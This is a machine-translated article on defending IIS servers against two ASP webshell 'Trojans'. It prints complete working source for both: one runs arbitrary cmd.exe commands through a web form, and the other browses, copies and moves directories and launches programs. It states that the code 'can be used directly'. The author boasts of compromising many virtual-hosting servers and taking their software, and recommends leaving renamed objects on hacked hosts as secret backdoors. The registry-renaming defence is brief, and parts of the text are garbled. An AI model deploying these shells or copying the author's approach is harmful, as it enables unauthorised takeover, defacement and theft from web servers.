Two comparison typical ASP Trojan guard method

Comparison | Trojan Horse

With the development of ASP technology, the Web site based on ASP technology is more and more, the support of ASP technology can be said to be a basic function of Windows system IIS server. But the backdoor of Trojan Horse based on ASP technology, also more and more, and function also more and more powerful. Because the ASP itself is the server to provide a tribute service function, so this ASP script Trojan door, will not be anti-virus software killing. By hackers are called "never be killed by the back door." Because of its high concealment and difficult to kill, the safety of the site poses a serious threat. Therefore, for the prevention and removal of ASP Trojan , for our network management personnel put forward a higher technical requirements. Below I combine personal experience, talk about two more typical ASP Trojan prevention method, hope for everyone can help.

The following is the code for the first Trojan:

<title>asp shell</title>
<%@ Language=vbscript%>
<%
Dim Oscript
Dim oscriptnet
Dim Ofilesys, Ofile
Dim Szcmd, Sztempfile
On Error Resume Next
--Create the COM objects that we'll be using--
Set oscript = Server.CreateObject ("WSCRIPT. SHELL ")
Set oscriptnet = Server.CreateObject ("Wscript.Network")
Set Ofilesys = Server.CreateObject ("Scripting.FileSystemObject")
--Check for a command so we have posted--
Szcmd = Request.Form (". CMD ")
If (Szcmd <> "") Then
--Use a poor mans pipe ... a temp file--
Sztempfile = "C:" & Ofilesys.gettempname ()
Call Oscript.run ("cmd.exe/c" & Szcmd & ">" & Sztempfile, 0, True)
Set ofile = Ofilesys.opentextfile (sztempfile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<form action= "<%= request.servervariables (" URL ")%>" method= "POST >
<input type=text name= ". CMD "size=45 value=" <%= szcmd%> ">
<input type=submit value= "execute command" >
</FORM>
<pre><%
If (IsObject (ofile)) Then
--Read the output from our command and remove the temp file--
On Error Resume Next
Response.Write Server.HTMLEncode (Ofile.readall)
Ofile.close
Call Ofilesys.deletefile (Sztempfile, True)
End If
%>
</BODY>
</HTML>

Enter dir command point execution on the command line to view the directory!! It can use a variety of DOS commands, such as: copy, net, netstat and so on.

However, its default execution permission is only guest, which is the Iusr_computer user's execute permission. Of course, if you add iusr_computer users to the Admins group, you have administrator privileges. The feature of this trojan is that it is very convenient to use. Almost want to be the same as DOS command line window xx. However, if the server restricts the FSO (no component uploads), then it has no way to use it. There is also in the server after the increase in the virtual host can not be used. Can only be used in the default Web site, so it is relatively narrow in scope.

For the precautionary approach let's take a look at its code and know:

Set oscript = Server.CreateObject ("WSCRIPT. SHELL ")" establishes a Wscript.Shell object named Oscript for command execution.
Set oscriptnet = Server.CreateObject ("Wscript.Network")
Set Ofilesys = Server.CreateObject ("Scripting.FileSystemObject")

The above three lines of code create Wscript.Shell, Wscript.Network, Scripting.FileSystemObject three objects, we simply rename or delete the items in the registry to control the Wscript.Shell object. The following figure: It is noteworthy: we should put "WSCRIPT." SHELL "Items and" WSCRIPT. SHELL.1 "Both should be renamed or deleted. Because if we only modify "WSCRIPT." SHELL "Item. So hackers simply modify the code as follows: Set oscript = Server.CreateObject ("WSCRIPT. SHELL.1 ") This backdoor Trojan can be executed again.

As you may have thought, we are on "WSCRIPT." SHELL "Items and" WSCRIPT. SHELL.1 "When renamed, must be not easy to be guessed by hackers, because for example: you put" WSCRIPT. The SHELL was "changed" to WSCRIPT. SHELL888 ". Hackers simply change the code accordingly: Set Oscript = Server.CreateObject ("WSCRIPT. SHELL888 "), Trojan Horse program can be executed again. There is also a change to the registry after the Web service to restart, the settings will be valid.

Next, let's take a look at the next ASP Backdoor Trojan program code:

<%response.write "<font size=6 color=red> can only perform one xx at a time </font>"%>
<%response.write now () The physical path where the program is located:%><br>
<%response.write Request.ServerVariables ("Appl_physical_path")%>
<title>asps Shell.Application Backdoor </title>
<body>
<form action= "<%= request.servervariables (" URL ")%>" method= "POST >
<input type=text name=text value= "<%=szcmd%>" > enter the directory to browse <br>
<input type=text name=text1 value= "<%=szcmd1%>" >
Copy
<input type=text name=text2 value= "<%=szcmd2%>" ><br>
<input type=text name=text3 value= "<%=szcmd3%>" >
Move
<input type=text name=text4 value= "<%=szcmd4%>" ><br>
Path: <input type=text name=text5 value= "<%=szcmd5%>" >
Program: <input type=text name=text6 value= "<%=szcmd6%>" ><br>
<input type=submit name=sb value= Send command >
</form>
</body>
<%
Szcmd = Request.Form ("text") directory browsing
if (Szcmd <> "") Then
Set Shell=server.createobject ("Shell.Application") to create a Shell object
Set Fod1=shell.namespace (Szcmd)
Set Foditems=fod1.items
For all Co in foditems
Response.Write "<font color=red>" & Co.path & "-----" & co.size & "</font><br>"
Next
End If
%> <%
szCMD1 = Request.Form ("Text1") directory copy, cannot make file copy
szCMD2 = Request.Form ("Text2")
If szcmd1<> "" and szcmd2<> "" Then
Set Shell1=server.createobject ("Shell.Application") to create a Shell object
Set Fod1=shell1.namespace (SZCMD2)
For I=len (SZCMD1) to 1 step-1
If mid (szcmd1,i,1) = "" Then
Path=left (szcmd1,i-1)
Exit For
End If
Next
If Len (path) =2 then Path=path & ""
Path2=right (Szcmd1,len (SZCMD1)-i)
Set Fod2=shell1.namespace (PATH)
Set Foditem=fod2.parsename (path2)
Fod1.copyhere Foditem
Response.Write "Command Completed success!"
End If
%> <%
SzCMD3 = Request.Form ("Text3") directory move
SzCMD4 = Request.Form ("Text4")
If szcmd3<> "" and szcmd4<> "" Then
Set Shell2=server.createobject ("Shell.Application") to create a Shell object
Set Fod1=shell2.namespace (SZCMD4) for I=len (SZCMD3) to 1 step-1
If mid (szcmd3,i,1) = "" Then
Path=left (szcmd3,i-1)
Exit For
End If
Next If Len (path) =2 then Path=path & ""
Path2=right (Szcmd3,len (SZCMD3)-i)
Set Fod2=shell2.namespace (PATH)
Set Foditem=fod2.parsename (path2)
Fod1.movehere Foditem
Response.Write "Command Completed success!"
End If
%>
<%
SzCMD5 = Request.Form ("TEXT5") executing program to specify path
SzCMD6 = Request.Form ("Text6")
If szcmd5<> "" and szcmd6<> "" Then
Set Shell3=server.createobject ("Shell.Application") to create a Shell object
Shell3.namespace (SZCMD5). Items.item (SZCMD6). Invokeverb
Response.Write "Command Completed success!"
End If
%>

To view the directory, just enter the appropriate directory, point to send the command on it. This trojan can complete the file copy, move, and execute the program. But many commands can not be used, such as: Del, net, netstat and so on. The function of this Trojan horse is simple, but it is enough to use it to black a website. For example, we can move the homepage of the site to other places, and then we copy a hacker Web page with the same name, on the line.

The most fatal thing is that this trojan is suitable for any virtual host, that is, I just a user of a virtual space in the server, I can pass this trojan, and use it to modify any other user's homepage. So if the service providers that provide virtual space are not patched, that's a dead end.

However, in my practice, I found that many of China's virtual space service providers, especially some small services have not patched. I took advantage of this vulnerability to access many virtual Space Server admin, and then kindly help them to fill the loophole. Of course I got what I wanted--lots of good software and code. I now use a lot of ASP program is from their top steal down, too harsh, should say down the only right.

Anyway, how should we prevent this ASP backdoor Trojan horse program? Let's take a look at this code: set Shell=server.createobject ("Shell.Application"), just like the previous method, we simply put "shell.application" and " Shell.application.1 "item renamed or deleted on it. Remember, if you change your name, make it a little more complicated, and don't let the hackers guess. By the way, if you make a patch for a chicken, it's best to rename it and write it down so it becomes a secret back door. Finally on the two ASP Trojan back door, and how to prevent the ASP Trojan back door to do a summary: The first Trojan is powerful, but the scope of application is narrow, need FSO support is also "Scripting.FileSystemObject" support. Although the second Trojan is less functional, it creates a "Shell.Application" object. Applies to any virtual host. (This is really too much harm, provide support for ASP space administrators, you have to pay attention to!) ）

In fact, according to the above two ASP Trojan back door prevention, we may have thought, for ASP backdoor Trojan Prevention, we just in the registry to "Shell.Application", "WSCRIPT." SHELL "and Other dangerous script objects (because they are used to create a script command channel) to rename or delete, that is, restricting the system to the" script Shell "creation, ASP Trojan Horse became non-existent, bricks without straw, not run up.

Note: The above code copy is saved as an ASP file and can be used directly.